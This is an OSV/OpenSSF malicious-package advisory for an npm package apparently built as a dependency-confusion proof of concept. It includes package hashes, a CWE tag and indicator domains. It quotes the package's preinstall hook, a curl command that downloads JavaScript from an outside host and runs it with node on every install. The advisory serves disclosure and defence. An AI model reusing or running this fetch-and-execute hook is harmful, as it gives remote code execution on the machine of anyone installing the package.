MAL-2026-5646

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sn-internal-testjgsakjdkjadkjahsdkjad/MAL-2026-5646.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5646

Published

2026-06-11T12:38:00Z

Modified

2026-06-11T13:46:35.625523384Z

Summary

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe)

package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install, the script fetches an unpinned, mutable JavaScript file from poc.amanrawat.com over plain HTTPS and immediately executes it with node under the installer's user account. There is no hash or signature verification, no version pinning, and the destination is not a recognized runtime/CDN or publisher-owned host. The package name (sn-internal-testjgsakjdkjadkjahsdkjad), description ("This is our internal app for testing"), and the poc. (proof-of-concept) hostname indicate this is a dependency-confusion / supply-chain PoC, but the install-time payload is a real and unconditional remote-code-execution primitive against any installer.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005711",
            "versions": [
                "2.1.1"
            ],
            "sha256": "41f34acb7ed9ab6c864394a7258065fc250cef58f144602ba585a80ed47ea70b",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T12:38:01Z",
            "import_time": "2026-06-11T13:27:19.212442801Z"
        },
        {
            "id": "IN-MAL-2026-005710",
            "versions": [
                "2.1.1"
            ],
            "sha256": "b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T12:38:00Z",
            "import_time": "2026-06-11T13:27:19.06337463Z"
        }
    ]
}

References

https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjahsdkjad/v/2.1.1

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / sn-internal-testjgsakjdkjadkjahsdkjad

Package

Name: sn-internal-testjgsakjdkjadkjahsdkjad; View open source insights on deps.dev
Purl: pkg:npm/sn-internal-testjgsakjdkjadkjahsdkjad

Affected ranges

Affected versions

2.*

2.1.1

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "85ab811a823394742db74f41af4c60e983b02e9b152f04be2e5394ebadbd3e30",
            "tlsh": "c9e0d8728b63553745c411a6ccaad81fd6528e2b0516780863af052c819a67794fe71d"
        }
    ],
    "package_integrity": [
        {
            "filename": "sn-internal-testjgsakjdkjadkjahsdkjad-2.1.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-BZzRqAQg1L2kpf3XgjtQ61Cvm34VGzH6NMEaaAeTGxfq1x3qXuptgVX+nKrdvR1TAZMItqyvAACfylyeNb9oEQ==",
                "sha1": "0284fcaa940c19713b65c095d6cc25e487a80f5a"
            }
        }
    ],
    "domains": [
        "poc.amanrawat.com",
        "webhook.site"
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sn-internal-testjgsakjdkjadkjahsdkjad/MAL-2026-5646.json"